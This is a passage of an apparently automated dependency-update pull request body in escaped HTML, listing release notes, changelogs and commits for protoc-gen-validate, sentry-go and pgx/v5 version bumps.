1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1351\"\u003ebufbuild/protoc-gen-validate#1351\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump wheel from 0.45.1 to 0.46.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1352\"\u003ebufbuild/protoc-gen-validate#1352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate go and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1355\"\u003ebufbuild/protoc-gen-validate#1355\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate python and deps by \u003ca href=\"https://github.com/rodaine\"\u003e\u003ccode\u003e@​rodaine\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1354\"\u003ebufbuild/protoc-gen-validate#1354\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the java group in /java with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1356\"\u003ebufbuild/protoc-gen-validate#1356\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-root group across 1 directory with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1357\"\u003ebufbuild/protoc-gen-validate#1357\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\"\u003ehttps://github.com/bufbuild/protoc-gen-validate/compare/v1.3.0...v1.3.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate README.md by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1233\"\u003ebufbuild/protoc-gen-validate#1233\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix unreliable asset generation by \u003ca href=\"https://github.com/nicksnyder\"\u003e\u003ccode\u003e@​nicksnyder\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bufbuild/protoc-gen-validate/pull/1235\"\u003ebufbuild/protoc-gen-validate#1235\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/92b9a7df69ca9f71bfc492f7a90adf4d36eab569\"\u003e\u003ccode\u003e92b9a7d\u003c/code\u003e\u003c/a\u003e Update Python 3.9 references to 3.10 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1370\"\u003e#1370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/e72f3dc29517fe8664e8f59680d0d48fa918df03\"\u003e\u003ccode\u003ee72f3dc\u003c/code\u003e\u003c/a\u003e Attempt to fix release (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1368\"\u003e#1368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/39d950bc7aafa91a2e592dc3a7b4768a189f0af1\"\u003e\u003ccode\u003e39d950b\u003c/code\u003e\u003c/a\u003e Bump the python-root group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1357\"\u003e#1357\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/c4c14142d65a4ba260d5f06fdd5e904f940c46a4\"\u003e\u003ccode\u003ec4c1414\u003c/code\u003e\u003c/a\u003e Bump the java group in /java with 2 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1356\"\u003e#1356\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/05cc215303e1297497ab092d97647eb4fb9ceb1a\"\u003e\u003ccode\u003e05cc215\u003c/code\u003e\u003c/a\u003e Update python and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1354\"\u003e#1354\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/1a76a21e21e50cbd1d42000baf3e8a285d6810dc\"\u003e\u003ccode\u003e1a76a21\u003c/code\u003e\u003c/a\u003e Update go and deps (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1355\"\u003e#1355\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/3212c98f3a0381ab8ca2f7c2ac733adbdae361da\"\u003e\u003ccode\u003e3212c98\u003c/code\u003e\u003c/a\u003e Bump wheel from 0.45.1 to 0.46.2 (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1352\"\u003e#1352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/4231822c297f46ae238f7130e3d6f747a24b2005\"\u003e\u003ccode\u003e4231822\u003c/code\u003e\u003c/a\u003e Bump the java group across 1 directory with 4 updates (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1351\"\u003e#1351\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/187ff66a4da4e35729d0946ae8eb24caf5168678\"\u003e\u003ccode\u003e187ff66\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.48.0 to 0.49.0 in /tests in the go-tests group (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/protoc-gen-validate/commit/ae40bad58381838eeb79628bfaf3d560f8a85a4a\"\u003e\u003ccode\u003eae40bad\u003c/code\u003e\u003c/a\u003e Replace deprecated java_proto_library from rules_java (\u003ca href=\"https://redirect.github.com/envoyproxy/protoc-gen-validate/issues/1349\"\u003e#1349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/envoyproxy/protoc-gen-validate/compare/v1.2.1...v1.3.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/getsentry/sentry-go` from 0.34.1 to 0.44.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/releases\"\u003egithub.com/getsentry/sentry-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nv0.44.0 had to be released as v0.44.1 due to a technical issue.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\r\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\r\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\r\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\r\n)\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eOther\u003c/h4\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-go/blob/master/CHANGELOG.md\"\u003egithub.com/getsentry/sentry-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.44.1\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003cbr /\u003e\nThe v0.44.0 is missing due to a technical issue and had to be released again as v0.44.1\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eNew Features ✨\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd RemoveAttribute api on the scope. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eScope.SetExtra\u003c/code\u003e, \u003ccode\u003eScope.SetExtras\u003c/code\u003e, and \u003ccode\u003eScope.RemoveExtra\u003c/code\u003e in favor of \u003ccode\u003eScope.SetAttributes\u003c/code\u003e and \u003ccode\u003eScope.RemoveAttribute\u003c/code\u003e by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1224\"\u003e#1224\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eThe recommended migration path is to use \u003ccode\u003eSetAttributes\u003c/code\u003e to attach values to logs and metrics. Note that attributes do not appear on error events; if you only capture errors, use \u003ccode\u003eSetTag\u003c/code\u003e or \u003ccode\u003eSetContext\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003eBefore:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetExtra(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetExtra(\u0026quot;key.int\u0026quot;, 42)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for error events) — use tags and contexts:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetTag(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;)\nscope.SetContext(\u0026quot;my_data\u0026quot;, sentry.Context{\u0026quot;key.int\u0026quot;: 42})\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eAfter (for logs and metrics) — use attributes:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cpre lang=\"go\"\u003e\u003ccode\u003escope.SetAttributes(\n    attribute.String(\u0026quot;key.string\u0026quot;, \u0026quot;str\u0026quot;),\n    attribute.Int(\u0026quot;key.int\u0026quot;, 42),\n)\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003eAdd support for homogenous arrays by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1203\"\u003e#1203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd support for client reports by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1192\"\u003e#1192\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd org id propagation in sentry_baggage by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd OrgID and StrictTraceContinuation client options. by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1210\"\u003e#1210\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd the option to set attributes on the scope by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1208\"\u003e#1208\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes 🐛\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e(serialization) Pre-serialize mutable event fields to prevent race panics by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1214\"\u003e#1214\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse HEROKU_BUILD_COMMIT with HEROKU_SLUG_COMMIT as fallback by \u003ca href=\"https://github.com/ericapisani\"\u003e\u003ccode\u003e@​ericapisani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1220\"\u003e#1220\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal Changes 🔧\u003c/h3\u003e\n\u003ch4\u003eAi\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eAdd AGENTS.md and testing guidelines by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1216\"\u003e#1216\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd dotagents configuration by \u003ca href=\"https://github.com/giortzisg\"\u003e\u003ccode\u003e@​giortzisg\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1211\"\u003e#1211\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eDeps\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump github.com/buger/jsonparser from 1.1.1 to 1.1.2 in /zerolog by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1231\"\u003e#1231\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/gofiber/fiber/v2 from 2.52.11 to 2.52.12 in /fiber by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/getsentry/sentry-go/pull/1209\"\u003e#1209\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/16414f29918c1fb660d4792046f08224dfefc632\"\u003e\u003ccode\u003e16414f2\u003c/code\u003e\u003c/a\u003e release: 0.44.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d26d3ecd4bceb8b900147c2e8faf993c1fdf8720\"\u003e\u003ccode\u003ed26d3ec\u003c/code\u003e\u003c/a\u003e ci: add preReleaseCommand for craft (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1232\"\u003e#1232\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/65538eb2c2b714f1aec781267612d97e4a4f8d94\"\u003e\u003ccode\u003e65538eb\u003c/code\u003e\u003c/a\u003e build(deps): bump github.com/buger/jsonparser in /zerolog (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1231\"\u003e#1231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/91096be62b80b40a2e1d8e62f42115dede34c054\"\u003e\u003ccode\u003e91096be\u003c/code\u003e\u003c/a\u003e chore: pin GitHub Actions to full-length commit SHAs (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1230\"\u003e#1230\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/df391b0baee60760635a948da32e82e362d7a84e\"\u003e\u003ccode\u003edf391b0\u003c/code\u003e\u003c/a\u003e feat: add RemoveAttribute api on the scope (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1224\"\u003e#1224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/340c142cf974aaba7dcb6545101fe125a7d8ad7c\"\u003e\u003ccode\u003e340c142\u003c/code\u003e\u003c/a\u003e fix: TestAsyncTransport_SendEnvelope flakiness (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1226\"\u003e#1226\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/e561a25fe7f0b594a005138bf71db4fd12faacf3\"\u003e\u003ccode\u003ee561a25\u003c/code\u003e\u003c/a\u003e build: Bump getsentry/craft to 2.24.1 (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1225\"\u003e#1225\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/259b20563d61c7da69d8d83361427e1a8bbd873a\"\u003e\u003ccode\u003e259b205\u003c/code\u003e\u003c/a\u003e feat: add support for homogenous arrays (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1203\"\u003e#1203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/bf26e9a107879c566124e27d5af51bd1851428d1\"\u003e\u003ccode\u003ebf26e9a\u003c/code\u003e\u003c/a\u003e fix: fix flaky TestAsyncTransport_FlushWithContext (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1222\"\u003e#1222\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/getsentry/sentry-go/commit/d1edaf4192ea39be6e16ec5145ded927adfed9e9\"\u003e\u003ccode\u003ed1edaf4\u003c/code\u003e\u003c/a\u003e chore(ai): Add AGENTS.md and testing guidelines (\u003ca href=\"https://redirect.github.com/getsentry/sentry-go/issues/1216\"\u003e#1216\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/getsentry/sentry-go/compare/v0.34.1...v0.44.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/jackc/pgx/v5` from 5.7.5 to 5.9.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jackc/pgx/blob/master/CHANGELOG.md\"\u003egithub.com/jackc/pgx/v5's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.9.1 (March 22, 2026)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix: batch result format corruption when using cached prepared statements (reported by Dirkjan Bussink)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e5.9.0 (March 21, 2026)\u003c/h1\u003e\n\u003cp\u003eThis release includes a number of new features such as SCRAM-SHA-256-PLUS support, OAuth authentication support, and\nPostgreSQL protocol 3.2 support.\u003c/p\u003e\n\u003cp\u003eIt significantly reduces the amount of network traffic when using prepared statements (which are used automatically by\ndefault) by avoiding unnecessary Describe Portal messages. This also reduces local memory usage.\u003c/p\u003e\n\u003cp\u003eIt also includes multiple fixes for potential DoS due to panic or OOM if connected to a malicious server that sends\ndeliberately malformed messages.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRequire Go 1.25+\u003c/li\u003e\n\u003cli\u003eAdd SCRAM-SHA-256-PLUS support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eAdd OAuth authentication support for PostgreSQL 18 (David Schneider)\u003c/li\u003e\n\u003cli\u003eAdd PostgreSQL protocol 3.2 support (Dirkjan Bussink)\u003c/li\u003e\n\u003cli\u003eAdd tsvector type support (Adam Brightwell)\u003c/li\u003e\n\u003cli\u003eSkip Describe Portal for cached prepared statements reducing network round trips\u003c/li\u003e\n\u003cli\u003eMake LoadTypes query easier to support on \u0026quot;postgres-like\u0026quot; servers (Jelte Fennema-Nio)\u003c/li\u003e\n\u003cli\u003eDefault empty user to current OS user matching libpq behavior (ShivangSrivastava)\u003c/li\u003e\n\u003cli\u003eOptimize LRU statement cache with custom linked list and node pooling (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize date scanning by replacing regex with manual parsing (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eOptimize pgio append/set functions with direct byte shifts (Mathias Bogaert)\u003c/li\u003e\n\u003cli\u003eMake RowsAffected faster (Abhishek Chanda)\u003c/li\u003e\n\u003cli\u003eFix: Pipeline.Close panic when server sends multiple FATAL errors (Varun Chawla)\u003c/li\u003e\n\u003cli\u003eFix: ContextWatcher goroutine leak (Hank Donnay)\u003c/li\u003e\n\u003cli\u003eFix: stdlib discard connections with open transactions in ResetSession (Jeremy Schneider)\u003c/li\u003e\n\u003cli\u003eFix: pipelineBatchResults.Exec silently swallowing lastRows error\u003c/li\u003e\n\u003cli\u003eFix: ColumnTypeLength using BPCharArrayOID instead of BPCharOID\u003c/li\u003e\n\u003cli\u003eFix: TSVector text encoding returning nil for valid empty tsvector\u003c/li\u003e\n\u003cli\u003eFix: wrong error messages for Int2 and Int4 underflow\u003c/li\u003e\n\u003cli\u003eFix: Numeric nil Int pointer dereference with Valid: true\u003c/li\u003e\n\u003cli\u003eFix: reversed strings.ContainsAny arguments in Numeric.ScanScientific\u003c/li\u003e\n\u003cli\u003eFix: message length parsing on 32-bit platforms\u003c/li\u003e\n\u003cli\u003eFix: FunctionCallResponse.Decode mishandling of signed result size\u003c/li\u003e\n\u003cli\u003eFix: returning wrong error in configTLS when DecryptPEMBlock fails (Maxim Motyshen)\u003c/li\u003e\n\u003cli\u003eFix: misleading ParseConfig error when default_query_exec_mode is invalid (Skarm)\u003c/li\u003e\n\u003cli\u003eFix: missed Unwatch in Pipeline error 